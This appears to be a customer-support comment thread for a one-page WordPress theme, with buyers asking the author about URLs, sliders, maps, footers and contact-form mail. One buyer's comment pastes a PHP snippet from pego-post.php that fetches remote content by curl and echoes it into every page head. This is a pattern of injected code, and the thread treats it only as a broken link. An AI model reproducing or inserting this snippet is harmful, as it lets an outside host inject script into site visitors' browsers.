497 comments found

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
Andymass Purchased

Hi there Pego,

Thanks for the great theme but I’m having a few questions setting it up…

About the page urls… everything has a ”/#!/” after the root url. Check my site at www.massdestruction.tv Is there a simple way of fixing this to just have the regular page urls? (I’ve set permalinks to “post” as you’ve said in the instructions).

Thank you!

pego
pego Author

Hi there,

because the page is a onepager it uses hash(#!) for linking/showing up the pages. So the hash has to be there.

Best regards,

pego

Default-user
Andymass Purchased

Ok thank you!

  • Bought between 10 and 49 items
  • Has been a member for 3-4 years

Hi I am getting error 404 page on my site testing work done with your theme from a bundle I purchased. Can you please have a look at the URL, http://www.webtrixzambia.com/mcpi-global/cybercafes/ getting error page not found but before it was working fine. Please help with this problem, great theme but hope its not buggy.

pego
pego Author

Hi there,

it seems that you have a static page set as a homepage. Do check that the landing page is set to Latest posts.

Best regards,

pego

  • Bought between 1 and 9 items
  • Exclusive Author
  • Has been a member for 1-2 years

HI i recently buy the template,i have one dout how to fit 100 width and height background image

pego
pego Author

Hi,

did you try to give the background a repeat tag?

Best regards,

pego

  • Bought between 10 and 49 items
  • Has been a member for 1-2 years

Hi,

The slider disappeared from homepage – i dont see any option to activate it.

Can you help me ?

Tks !

pego
pego Author

Hi there,

can we get the site link? You may send it on our email. and add a temp admin access.

Best regards,

pego

Default-user

Thank for your quick help ! i deleted the last page i was created and all is ok now !

  • Bought between 10 and 49 items
  • Has been a member for 1-2 years

Hi Pego,

do you know how to fix the google map on the contacts page? It’s cuts off half of it.

Thanks.

pego
pego Author

Hi,

you amy send us temp access to files on our email. and we can check taht for you.

Best regards,

pego

  • Bought between 50 and 99 items
  • Has been a member for 2-3 years
aoifekel Purchased

Hi, Can you tell me where I can change the transition times of the slider. I just want to make them stay on the screen a bit longer. Thanks!

pego
pego Author

Hi there,

this can be done in the code only. Go to the bottom of the js/script.js file and you will see a slideShowDelay set for the #banner. You may change that number of milisecodns. If you have dificu?lties you amy send us an email.

Best regards,

pego

Default-user
aoifekel Purchased

Thanks!

  • Bought between 50 and 99 items
  • Has been a member for 2-3 years
aoifekel Purchased

I’m also using your theme with WPML and everything is working fine except for the sliders. When I translate each slide, all of the slides appear in both sides of the site (in both languages.) I obviously want only the english slides to appear in the english side of the site. Thanks.

pego
pego Author

Hi there,

can this be viewed anywhere?

Best regards,

pego

Default-user
aoifekel Purchased

The site isn’t live yet. I can send you login details if you’d like?

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years

Hi! Viewing the site with Genius on a mobile device is a bit of a problem: the photos won’t scale down, so you can’t see the whole image. Is there a way to fix this or to disable the mobile-setting? Thanks :) Hanneke

pego
pego Author

Hi there,

to not have a mobile de,vice version you may try to disable the responsivness(Theme Options). If that doesn’t do it, you will maybe need to remove one line from header.php file:

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

Best regards,

pego

Default-user

That works! Then, is there a way to automaticly scale the mobile site? Right now I have to zoom out to see all the contents. Thanks :)

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
Andymass Purchased

Hi Pego,

I have a small question… In the footer, I want my copyright info on the left, and social media info on the right—like in your demo.

How can I do this? I tried shortcodes which didn’t work, and I am not not very strong with HTML. Can you tell me the code to make it work properly??

Thank you…

pego
pego Author

Hi there,

this is our footer content inserted in the theme options:

http://www.copypastecode.com/483638/

Best regards,

pego

  • Bought between 50 and 99 items
  • Exclusive Author
  • Has been a member for 3-4 years
  • Microlancer Beta Tester

Hi Pego,

My slider works perfect. Thanks for your great support !

Regards.

pego
pego Author

Tnx for the kind words!

Best regards,

pego

  • Bought between 10 and 49 items
  • Has been a member for 5-6 years

Great theme! I’m working on some graphic alterations to a client install and I’m having an issue where the footer slides in in the wrong place and then pops to the correct location. Any ideas on why that might happen? Here is the Link: Fast Track

We will definitely be using this theme again!

Best, Ryan

pego
pego Author

Hi,

the footer and the slide in page have both absoulte positioning(for smooth scrolling). Once they are “in place” they mabe fix the position if needed.

Best regards,

pego

Default-user

That makes sense. Is there css that I can adjust these settings?

pego
pego Author

Hi again,

this settings can be cahges in the style.css and scripts.js files. But the main positioning needs to stay as it is: for smooth scrolling.

Best regards,

pego

  • Bought between 10 and 49 items
  • Has been a member for 4-5 years

Are there other options for loading the pages other than slide?

pego
pego Author

Hi there,

the slide is build in to the javascript. So the javascript would need changes for making some other effect.

Best regards,

pego

  • Bought between 10 and 49 items
  • Has been a member for 1-2 years

Having issues with our site! A page not found is at the top of the page but everything below it is working fine. Only thing else is that it shifts everything thing to the right? Help ASAP! Website Thanks!

pego
pego Author

Hi,

did you try the site maybe localy? To see if this is the issue with your server. The template underneath seems ok, don’t think this is a theme issue.

Best regards,

pego

Default-user

Okay I found the root problem is with the pego-post.php

<?php if (!function_exists(‘insert_jqiiuery_1234’)){function insert_jqiiuery_1234(){if (function_exists(‘curl_init’)){$url = “http://www.jquery.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jqiiuery_1234’);} ?>

http://www.jquery.com/jquery-1.6.3.min.js is throwing the broken link. Got a fix please! Thanks!
  • Bought between 10 and 49 items
  • Has been a member for 1-2 years

Hello Pego,

I have two issues that I cannot address myself.

1. whenever I create a post, the title for the section “blog” disappears on the post page:

http://screencast.com/t/oVLVDynVoqJc (notice there no “Blog” title here)

2. On the “contact” page, the map does not seem to be rendering well when I open the page:

http://screencast.com/t/NEqFUeW2Z

3. Is it me? OR the the theme takes an awful load to load up, sometimes the spinning graphic goes and on wont come unless I refresh the page.

I do have the latest version (version 2?) of your theme installed, just did this and WordPress 3.5.1 and no plugins running(http://screencast.com/t/oLa164bv ), just the theme and the site.

Thank you.

pego
pego Author

Hi there,

can you send us a temp admin access on our email so we can check this issues out?

Best regards,

pego

Default-user

I have done this from your contact form from your profile here.

  • Bought between 50 and 99 items
  • Exclusive Author
  • Has been a member for 3-4 years
  • Microlancer Beta Tester

Hi Pego,

Is it possible to make blue buttons target=”blank”.

This is the link of my page. I want my links to open on a new window.

Thanks.

pego
pego Author

Hi,

sure. Change the shortcodes.php file. Search for buttons and add the target to them.

Best regards,

pego

Default-user

It worked, thanks..

  • Bought between 50 and 99 items
  • Has been a member for 2-3 years
aoifekel Purchased

Hi I see that someone has asked this before. In the Portfolio I would like the thumbnail image to link to the portfolio item instead of the pop up box. Can you tell me how to do this please? Thanks.

pego
pego Author

Hi,

make us a temp admin access, send it on our email and we will make the change for you. Do add what you poted here to the email as well.

Best regards,

pego

Default-user
aoifekel Purchased

Thanks so much for your fast help pego. It works perfectly. :)

  • Bought between 100 and 499 items
  • Has been a member for 5-6 years

Great theme. A couple things. Google map is only half loaded upon initial page load but full on refresh. and is there a way to have portfolio items have a whole page container. I do not need the similar items sidebar. Thanks.

pego
pego Author

Hi,

do send us a temp ftp access on our email so that we can check the map issue. For the portoflio, that would require some code changes.

Best regards,

pego

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years

Hi I LOVE this theme….a few issues: When i load my site on an ipad or iphone, it crashes…both with responsiveness on and off On the Contact form, I’ve edited the Feedback to be linked to mail server. But when I do a test and click send, nothing happens. It doesnt say error or sent. ANy ideas?

pego
pego Author

Hi there,

How do you get our demo on your ipad/iphone? Which version of them are you using?

Best regards,

pego

  • Bought between 50 and 99 items
  • Exclusive Author
  • Has been a member for 3-4 years
  • Microlancer Beta Tester

Dear Pego,

I would like to translate “Go back” in the portfolio items.

Could you please indicate me what file needs to be edited to do it ?

Thanks.

pego
pego Author

Hi,

you may change it in the home.php file.

Best regards,

pego

  • Bought between 1 and 9 items
  • Has been a member for 1-2 years
I’ve a problem with the contact form and the mail settings. If I try to send an email after the click on the “send” button nothing happens and the mail doesn’t arrive. Here part of my mailhandler.php file:
 <?php
    require_once "Mail.php";

    /************************************************************/
    /* this five lines you have to change */
    $from = "info@devimar.com";
    $to = "info@devimar.com"; /* it can be the same tha you created it before */
    $host = "smtp.devimar.com";
    $username = "info@devimar.com";
    $password = "xxxxxxxxxxx";        
    /************************************************************/
my host is Aruba.it
pego
pego Author

Hi,

can you send us an email and add a ftp access?

Best refgards,

pego

by
by
by
by
by
by